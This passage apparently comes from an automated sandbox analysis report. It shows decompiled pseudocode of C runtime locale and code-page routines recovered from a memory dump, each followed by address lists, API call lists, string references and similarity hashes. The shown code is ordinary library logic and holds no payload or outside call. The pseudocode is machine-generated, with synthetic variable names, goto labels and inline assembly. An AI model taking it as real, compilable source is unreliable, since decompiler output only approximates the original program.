				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E538F6C(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6e54f052
0x6e54f053
0x6e54f05a
0x6e54f0fe
0x6e54f117
0x6e54f11d
0x6e54f122
0x6e54f124
0x6e54f124
0x6e54f12a
0x6e54f12d
0x6e54f12d
0x6e54f119
0x6e54f119
0x00000000
0x6e54f119
0x6e54f060
0x6e54f065
0x00000000
0x00000000
0x6e54f06b
0x6e54f070
0x6e54f072
0x6e54f072
0x6e54f078
0x00000000
0x00000000
0x6e54f07d
0x6e54f094
0x6e54f094
0x6e54f09d
0x6e54f09f
0x00000000
0x00000000
0x6e54f0a1
0x6e54f0a6
0x6e54f0a8
0x6e54f0a8
0x6e54f0ae
0x00000000
0x00000000
0x6e54f0b3
0x6e54f0d1
0x6e54f0d3
0x6e54f0f6
0x00000000
0x6e54f0fb
0x6e54f0ee
0x00000000
0x00000000
0x6e54f0f0
0x00000000
0x6e54f0f0
0x6e54f0b5
0x6e54f0bd
0x00000000
0x00000000
0x6e54f0bf
0x6e54f0c2
0x6e54f0c8
0x00000000
0x00000000
0x00000000
0x6e54f0ca
0x6e54f0cc
0x6e54f0ce
0x00000000
0x6e54f0ce
0x6e54f07f
0x6e54f087
0x00000000
0x00000000
0x6e54f089
0x6e54f08c
0x6e54f092
0x00000000
0x00000000
0x00000000
0x6e54f092
0x6e54f098
0x6e54f09a
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6E54F36B,00000002,00000000,?,?,?,6E54F36B,?,00000000), ref: 6E54F0E6
GetLocaleInfoW.KERNEL32(?,20001004,6E54F36B,00000002,00000000,?,?,?,6E54F36B,?,00000000), ref: 6E54F10F
GetACP.KERNEL32(?,?,6E54F36B,?,00000000), ref: 6E54F124

Strings

ACP, xrefs: 6E54F06B
OCP, xrefs: 6E54F0A1

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: e12b7a349423894787d9b5d34dcfbf71e0f96ae5d93cba3e7e14e37a78e99702
Instruction ID: 47f0108d8bdc9cd25a89a8ef0974af7c961944fc944c30e022cc1198ed51e3cb
Opcode Fuzzy Hash: e12b7a349423894787d9b5d34dcfbf71e0f96ae5d93cba3e7e14e37a78e99702
Instruction Fuzzy Hash: 8E21F172654101EAE766CFEDC905A9B73F6EB84B54B72A424E90ED7208F732CA40C370

Uniqueness

Uniqueness Score: -1.00%

Function 6E54F222, Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E54F222(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t39 ^ _t107;
				_t88 = _a12;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E5410D8(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E5410D8(__ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0x6e627d04; // 0x17
					E6E54F1C1(_t91, 0, 0x6e627bf0, _t84 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E6E54EB63(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E6E54EC49(_t91, _t99, __eflags,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t104 = E6E54F04D(_t91,  ~_t104 & _t104 + 0x00000100,  &_v20);
							__eflags = _t104;
							if(_t104 == 0) {
								L22:
								L23:
								return E6E52F227(_v8 ^ _t107, _t104);
							}
							_t55 = IsValidCodePage(_t104 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t104;
							}
							E6E544C0B(_v16,  &(_v24[0x128]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xd0
							E6E544C0B(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0x30
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xb0
							E6E550E15(_t38, _t104, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0x6e627bec; // 0x41
						_t76 = E6E54F1C1(_t91, _t99, 0x6e6278e0, _t74 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E6E54EC49(_t91, _t99, __eflags,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t121 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E6E54EBAE(_t91, _t99, _t121,  &_v20);
						goto L15;
					}
					_t117 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E6E54EBAE(_t91, _t99, _t117,  &_v20);
					goto L9;
				}
			}

0x6e54f22a
0x6e54f231
0x6e54f238
0x6e54f23c
0x6e54f240
0x6e54f24e
0x6e54f253
0x6e54f254
0x6e54f255
0x6e54f256
0x6e54f25e
0x6e54f260
0x6e54f266
0x6e54f26c
0x6e54f26f
0x6e54f271
0x6e54f274
0x6e54f278
0x6e54f27f
0x6e54f28c
0x6e54f291
0x6e54f294
0x6e54f297
0x6e54f297
0x6e54f299
0x6e54f29c
0x6e54f2a0
0x6e54f310
0x6e54f312
0x6e54f314
0x6e54f327
0x6e54f327
0x6e54f32e
0x6e54f334
0x6e54f337
0x00000000
0x6e54f337
0x6e54f316
0x6e54f319
0x00000000
0x00000000
0x6e54f31f
0x6e54f324
0x00000000
0x6e54f2a7
0x6e54f2a7
0x6e54f2ab
0x6e54f2bd
0x6e54f2c1
0x6e54f2c6
0x6e54f2ca
0x6e54f2cb
0x6e54f353
0x6e54f353
0x6e54f355
0x6e54f361
0x6e54f36b
0x6e54f36f
0x6e54f371
0x6e54f342
0x6e54f344
0x6e54f352
0x6e54f352
0x6e54f377
0x6e54f37d
0x6e54f37f
0x00000000
0x00000000
0x6e54f386
0x6e54f38c
0x6e54f38e
0x00000000
0x00000000
0x6e54f390
0x6e54f393
0x6e54f395
0x6e54f397
0x6e54f397
0x6e54f3a8
0x6e54f3ad
0x6e54f3af
0x6e54f40f
0x00000000
0x6e54f411
0x6e54f3b4
0x6e54f3be
0x6e54f3ce
0x6e54f3d4
0x6e54f3d6
0x00000000
0x00000000
0x6e54f3de
0x6e54f3ed
0x6e54f3f3
0x6e54f3f5
0x00000000
0x00000000
0x6e54f3ff
0x6e54f407
0x00000000
0x6e54f40c
0x6e54f2d1
0x6e54f2e0
0x6e54f2e5
0x6e54f2ea
0x6e54f33a
0x6e54f33a
0x6e54f33a
0x6e54f33c
0x6e54f340
0x00000000
0x00000000
0x00000000
0x6e54f340
0x6e54f2ec
0x6e54f2ee
0x6e54f2f2
0x6e54f304
0x6e54f308
0x6e54f30d
0x6e54f30d
0x00000000
0x6e54f30d
0x6e54f2f4
0x6e54f2f7
0x00000000
0x00000000
0x6e54f2fd
0x00000000
0x6e54f2fd
0x6e54f2ad
0x6e54f2b0
0x00000000
0x00000000
0x6e54f2b6
0x00000000
0x6e54f2b6

APIs

Part of subcall function 6E5410D8: GetLastError.KERNEL32(6E53413C,6E53413C,900C408B,6E54571D,?,6E53413C,00000000,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000), ref: 6E5410DD
Part of subcall function 6E5410D8: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000,8304488B,?,?,00000000), ref: 6E54117B

Part of subcall function 6E5410D8: _free.LIBCMT ref: 6E54113A
Part of subcall function 6E5410D8: _free.LIBCMT ref: 6E541170

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E54F32E
IsValidCodePage.KERNEL32(00000000), ref: 6E54F377
IsValidLocale.KERNEL32(?,00000001), ref: 6E54F386
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E54F3CE
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E54F3ED

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 11f2581fd5dfa14eb2f2f2c61a72b670502da5455555236f690a6619e3d250e9
Instruction ID: 4acfa37ca41d3d2bc0a9c93f2980c3374f1261c6d01b827633efde84b976a24a
Opcode Fuzzy Hash: 11f2581fd5dfa14eb2f2f2c61a72b670502da5455555236f690a6619e3d250e9
Instruction Fuzzy Hash: 2F515F71A00206EFEF41DFE9CC55ABE77F8AF45704F64582AEA14EB180D77099408B71

Uniqueness

Uniqueness Score: -1.00%

Function 6E5301F3, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E5301FF
IsDebuggerPresent.KERNEL32 ref: 6E5302CB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E5302EB
UnhandledExceptionFilter.KERNEL32(?), ref: 6E5302F5

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4bf8f973616357d339c804d9ca8b5c7c4d204e62126280ff98e3731111b42eb9
Instruction ID: 80793c4a98373c7f9a56b979bdebaddecad030ce3849787980f194da0d2d3eaa
Opcode Fuzzy Hash: 4bf8f973616357d339c804d9ca8b5c7c4d204e62126280ff98e3731111b42eb9
Instruction Fuzzy Hash: 76312675D5632CDBDF11DFA5CA897CDBBF8AF08304F1040AAE409AB250EB719A848F04

Uniqueness

Uniqueness Score: -1.00%

Function 6E53A460, Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E53A460(void* __ebx, void* __edx, void* __edi, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __esi;
				signed int _t126;
				intOrPtr* _t131;
				signed int* _t148;
				signed short _t151;
				signed int _t152;
				void* _t154;
				void* _t157;
				void* _t160;
				void* _t161;
				void* _t165;
				signed int _t166;
				signed int* _t167;
				signed char _t184;
				signed int* _t187;
				void* _t191;
				char _t196;
				signed char _t198;
				void* _t205;
				signed int* _t207;
				void* _t209;
				signed int* _t211;
				void* _t214;
				intOrPtr _t215;
				intOrPtr _t219;
				signed int* _t223;
				intOrPtr _t224;
				signed int _t225;
				signed int _t232;
				char* _t233;
				intOrPtr _t234;
				void* _t238;
				signed int* _t239;
				signed char* _t240;
				void* _t242;
				signed int** _t244;
				signed int** _t245;
				signed char* _t256;
				void* _t258;
				intOrPtr* _t259;
				signed int _t263;
				short* _t264;
				signed int _t267;
				signed int _t268;
				void* _t269;
				void* _t270;

				_t126 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t126 ^ _t268;
				_t259 = _a4;
				_t207 = 0;
				_v56 = _t259;
				_t242 = 0;
				_v32 = 0;
				_t215 =  *((intOrPtr*)(_t259 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t259;
				_v88 = 0;
				if(_t215 == 0) {
					__eflags =  *(_t259 + 0x8c);
					if( *(_t259 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t259 + 0x8c) = _t207;
					__eflags = 0;
					 *(_t259 + 0x90) = _t207;
					 *_t259 = 0x6e6254b8;
					 *(_t259 + 0x94) = 0x6e625738;
					 *(_t259 + 0x98) = 0x6e6258b8;
					 *(_t259 + 4) = 1;
					L48:
					return E6E52F227(_v8 ^ _t268, _t259);
				}
				_t131 = _t259 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E6E544550(1, 4);
					E6E541B83(_t207);
					_v32 = E6E544550(0x180, 2);
					E6E541B83(_t207);
					_t242 = E6E544550(0x180, 1);
					_v44 = _t242;
					E6E541B83(_t207);
					_v36 = E6E544550(0x180, 1);
					E6E541B83(_t207);
					_v40 = E6E544550(0x101, 1);
					E6E541B83(_t207);
					_t270 = _t269 + 0x3c;
					if(_v52 == _t207 || _v32 == _t207) {
						L43:
						E6E541B83(_v52);
						E6E541B83(_v32);
						E6E541B83(_t242);
						E6E541B83(_v36);
						_t207 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t219 = _v40;
						if(_t219 == 0 || _t242 == 0 || _v36 == _t207) {
							goto L43;
						} else {
							_t148 = _t207;
							do {
								 *(_t148 + _t219) = _t148;
								_t148 =  &(_t148[0]);
							} while (_t148 < 0x100);
							if(GetCPInfo( *(_t259 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t151 = _v28;
							if(_t151 > 5) {
								goto L43;
							}
							_t152 = _t151 & 0x0000ffff;
							_v60 = _t152;
							if(_t152 <= 1) {
								L22:
								_t37 = _t242 + 0x81; // 0x81
								_v48 = _v40 + 1;
								_t154 = E6E546B49(_t207, _t242, _t288, _t207,  *((intOrPtr*)(_t259 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t259 + 8), _t207);
								_t270 = _t270 + 0x24;
								_t289 = _t154;
								if(_t154 == 0) {
									goto L43;
								}
								_t157 = E6E546B49(_t207, _t242, _t289, _t207,  *((intOrPtr*)(_t259 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t259 + 8), _t207);
								_t270 = _t270 + 0x24;
								_t290 = _t157;
								if(_t157 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t160 = E6E54685C(_t207, 0xff, _t242, _t290, _t207, 1, _v40, 0x100, _v32 + 0x100,  *(_t259 + 8), _t207);
								_t270 = _t270 + 0x1c;
								if(_t160 == 0) {
									goto L43;
								}
								_t161 = _v32;
								_t223 = _t161 + 0xfe;
								 *_t223 = 0;
								_t238 = _v44;
								_v76 = _t223;
								_t224 = _v36;
								_t244 = _t238 + 0x80;
								 *(_t238 + 0x7f) = _t207;
								_v80 = _t244;
								 *(_t224 + 0x7f) = _t207;
								 *_t244 = _t207;
								_t245 = _t224 + 0x80;
								_v84 = _t245;
								 *_t245 = _t207;
								if(_v60 <= 1) {
									L39:
									_t225 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t225 << 2);
									_push(0x1f);
									asm("movsw");
									_t165 = memcpy(_t238, _t238 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t166 = memcpy(_t165, _t165 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t259 = _v56;
									if( *(_t259 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t166 | 0xffffffff) == 0) {
											E6E541B83( *(_t259 + 0x90) - 0xfe);
											E6E541B83( *(_t259 + 0x94) - 0x80);
											E6E541B83( *(_t259 + 0x98) - 0x80);
											E6E541B83( *(_t259 + 0x8c));
										}
									}
									_t167 = _v52;
									 *_t167 = 1;
									 *(_t259 + 0x8c) = _t167;
									 *_t259 = _v72;
									 *(_t259 + 0x90) = _v76;
									 *(_t259 + 0x94) = _v80;
									 *(_t259 + 0x98) = _v84;
									 *(_t259 + 4) = _v60;
									L44:
									E6E541B83(_v40);
									goto L48;
								}
								if( *(_t259 + 8) != 0xfde9) {
									_t256 =  &_v22;
									__eflags = _v22 - _t207;
									if(_v22 == _t207) {
										goto L39;
									}
									_t209 = _v32;
									while(1) {
										_t184 = _t256[1];
										__eflags = _t184;
										if(_t184 == 0) {
											break;
										}
										_t263 =  *_t256 & 0x000000ff;
										_v64 = _t263;
										__eflags = _t263 - (_t184 & 0x000000ff);
										if(_t263 > (_t184 & 0x000000ff)) {
											L37:
											_t256 =  &(_t256[2]);
											__eflags =  *_t256;
											if( *_t256 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t238;
										_t187 = _t224 + 0x80 + _t263;
										_t239 = _t238 - _t224;
										__eflags = _t239;
										_t232 = _v64;
										_t264 = _t209 - 0xffffff00 + _t263 * 2;
										_v68 = _t187;
										_t211 = _t187;
										do {
											 *_t264 = 0x8000;
											_t264 = _t264 + 2;
											 *(_t239 + _t211) = _t232;
											 *_t211 = _t232;
											_t232 = _t232 + 1;
											_t211 =  &(_t211[0]);
											__eflags = _t232 - (_t256[1] & 0x000000ff);
										} while (_t232 <= (_t256[1] & 0x000000ff));
										_t238 = _v44;
										_t224 = _v36;
										_t209 = _v32;
										goto L37;
									}
									L38:
									_t207 = 0;
									goto L39;
								}
								_v44 = _t161 + 0x200;
								_t233 = _t238 + 0x100;
								_t258 = _t224 - _t238;
								_t191 = 0xffffff80;
								_v48 = _t191 - _t238;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t233 & 0xffff8000) + 0x8000;
									_t214 = _v48;
									_t196 = _t233 + _t214;
									 *_t233 = _t196;
									 *((char*)(_t258 + _t233)) = _t196;
									_t233 = _t233 + 1;
								} while (_t214 + _t233 <= 0xff);
								goto L38;
							}
							_t288 =  *(_t259 + 8) - 0xfde9;
							if( *(_t259 + 8) != 0xfde9) {
								_t240 =  &_v22;
								__eflags = _v22 - _t207;
								if(__eflags == 0) {
									goto L22;
								}
								_t234 = _v40;
								while(1) {
									_t198 = _t240[1];
									__eflags = _t198;
									if(__eflags == 0) {
										break;
									}
									_t267 =  *_t240 & 0x000000ff;
									__eflags = _t267 - (_t198 & 0x000000ff);
									if(_t267 > (_t198 & 0x000000ff)) {
										L20:
										_t240 =  &(_t240[2]);
										__eflags =  *_t240 - _t207;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t267 + _t234)) = 0x20;
										_t267 = _t267 + 1;
										__eflags = _t267 - (_t240[1] & 0x000000ff);
									} while (_t267 <= (_t240[1] & 0x000000ff));
									goto L20;
								}
								_t259 = _v56;
								goto L22;
							}
							E6E531060(_t242, _v40 - 0xffffff80, 0x20, 0x80);
							_t270 = _t270 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t215);
				_push(0);
				_push( &_v92);
				_t205 = E6E5466AC(0, __edx, 0);
				_t270 = _t269 + 0x14;
				if(_t205 != 0) {
					goto L43;
				}
				goto L3;
			}

0x6e53a468
0x6e53a46f
0x6e53a474
0x6e53a477
0x6e53a47a
0x6e53a47d
0x6e53a47f
0x6e53a482
0x6e53a488
0x6e53a48b
0x6e53a48e
0x6e53a491
0x6e53a496
0x6e53a879
0x6e53a87b
0x6e53a87d
0x6e53a87d
0x6e53a880
0x6e53a886
0x6e53a888
0x6e53a88e
0x6e53a894
0x6e53a89e
0x6e53a8a8
0x6e53a8af
0x6e53a8bd
0x6e53a8bd
0x6e53a49c
0x6e53a49f
0x6e53a4a4
0x6e53a4c2
0x6e53a4cc
0x6e53a4cf
0x6e53a4e2
0x6e53a4e5
0x6e53a4f2
0x6e53a4f5
0x6e53a4f8
0x6e53a50a
0x6e53a50d
0x6e53a51f
0x6e53a522
0x6e53a527
0x6e53a52d
0x6e53a842
0x6e53a845
0x6e53a84d
0x6e53a853
0x6e53a85b
0x6e53a865
0x6e53a865
0x00000000
0x6e53a53c
0x6e53a53c
0x6e53a541
0x00000000
0x6e53a558
0x6e53a558
0x6e53a55a
0x6e53a55a
0x6e53a55d
0x6e53a55e
0x6e53a574
0x00000000
0x00000000
0x6e53a57a
0x6e53a580
0x00000000
0x00000000
0x6e53a586
0x6e53a589
0x6e53a58f
0x6e53a5e5
0x6e53a5e8
0x6e53a607
0x6e53a60b
0x6e53a610
0x6e53a613
0x6e53a615
0x00000000
0x00000000
0x6e53a63e
0x6e53a643
0x6e53a646
0x6e53a648
0x00000000
0x00000000
0x6e53a663
0x6e53a669
0x6e53a66e
0x6e53a673
0x00000000
0x00000000
0x6e53a679
0x6e53a682
0x6e53a688
0x6e53a68b
0x6e53a68e
0x6e53a691
0x6e53a694
0x6e53a69a
0x6e53a69d
0x6e53a6a0
0x6e53a6a3
0x6e53a6a5
0x6e53a6ab
0x6e53a6ae
0x6e53a6b0
0x6e53a780
0x6e53a787
0x6e53a788
0x6e53a793
0x6e53a796
0x6e53a798
0x6e53a7a2
0x6e53a7a5
0x6e53a7a7
0x6e53a7b0
0x6e53a7b2
0x6e53a7b4
0x6e53a7b5
0x6e53a7c0
0x6e53a7c5
0x6e53a7c9
0x6e53a7d7
0x6e53a7ea
0x6e53a7f8
0x6e53a803
0x6e53a808
0x6e53a7c9
0x6e53a80b
0x6e53a80e
0x6e53a814
0x6e53a81d
0x6e53a822
0x6e53a82b
0x6e53a834
0x6e53a83d
0x6e53a866
0x6e53a869
0x00000000
0x6e53a86f
0x6e53a6bd
0x6e53a716
0x6e53a719
0x6e53a71c
0x00000000
0x00000000
0x6e53a71e
0x6e53a721
0x6e53a721
0x6e53a724
0x6e53a726
0x00000000
0x00000000
0x6e53a728
0x6e53a72e
0x6e53a731
0x6e53a733
0x6e53a776
0x6e53a776
0x6e53a779
0x6e53a77c
0x00000000
0x00000000
0x00000000
0x6e53a77c
0x6e53a73b
0x6e53a744
0x6e53a746
0x6e53a746
0x6e53a748
0x6e53a74b
0x6e53a74e
0x6e53a751
0x6e53a753
0x6e53a758
0x6e53a75b
0x6e53a75e
0x6e53a761
0x6e53a763
0x6e53a768
0x6e53a769
0x6e53a769
0x6e53a76d
0x6e53a770
0x6e53a773
0x00000000
0x6e53a773
0x6e53a77e
0x6e53a77e
0x00000000
0x6e53a77e
0x6e53a6c6
0x6e53a6c9
0x6e53a6d6
0x6e53a6d8
0x6e53a6dd
0x6e53a6e0
0x6e53a6e3
0x6e53a6eb
0x6e53a6ed
0x6e53a6fb
0x6e53a6fe
0x6e53a701
0x6e53a704
0x6e53a706
0x6e53a709
0x6e53a70d
0x00000000
0x6e53a714
0x6e53a591
0x6e53a598
0x6e53a5b2
0x6e53a5b5
0x6e53a5b8
0x00000000
0x00000000
0x6e53a5ba
0x6e53a5bd
0x6e53a5bd
0x6e53a5c0
0x6e53a5c2
0x00000000
0x00000000
0x6e53a5c4
0x6e53a5ca
0x6e53a5cc
0x6e53a5db
0x6e53a5db
0x6e53a5de
0x6e53a5e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e53a5ce
0x6e53a5ce
0x6e53a5ce
0x6e53a5d2
0x6e53a5d7
0x6e53a5d7
0x00000000
0x6e53a5ce
0x6e53a5e2
0x00000000
0x6e53a5e2
0x6e53a5a8
0x6e53a5ad
0x00000000
0x6e53a5ad
0x6e53a541
0x6e53a52d
0x6e53a4a6
0x6e53a4a7
0x6e53a4ac
0x6e53a4b0
0x6e53a4b1
0x6e53a4b2
0x6e53a4b7
0x6e53a4bc
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 6E53A4CF
_free.LIBCMT ref: 6E53A4E5
_free.LIBCMT ref: 6E53A4F8
_free.LIBCMT ref: 6E53A50D
_free.LIBCMT ref: 6E53A522
GetCPInfo.KERNEL32(?,?), ref: 6E53A56C

Part of subcall function 6E5466AC: _free.LIBCMT ref: 6E546717

_free.LIBCMT ref: 6E53A7D7
_free.LIBCMT ref: 6E53A7EA
_free.LIBCMT ref: 6E53A7F8
_free.LIBCMT ref: 6E53A803
_free.LIBCMT ref: 6E53A845
_free.LIBCMT ref: 6E53A84D
_free.LIBCMT ref: 6E53A853
_free.LIBCMT ref: 6E53A85B
_free.LIBCMT ref: 6E53A869

Strings

8Wbn, xrefs: 6E53A894

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID: 8Wbn
API String ID: 2509303402-2162782749
Opcode ID: 7fbe332ff21e730336d51cf2c8b23c10cbc08efb28e657af5138d9ef224d112f
Instruction ID: 2afd3ba9d948e305d82b784daa3a9e9333c0c4536d5a487324eaf191d1b7f347
Opcode Fuzzy Hash: 7fbe332ff21e730336d51cf2c8b23c10cbc08efb28e657af5138d9ef224d112f
Instruction Fuzzy Hash: A9D19C71D003169FDF11CFB8C880BEEBBF9BF48304F204529E5A5A7292EB71A9458B50

Uniqueness

Uniqueness Score: -1.00%

Function 6E549F36, Relevance: 25.9, APIs: 17, Instructions: 411
COMMON

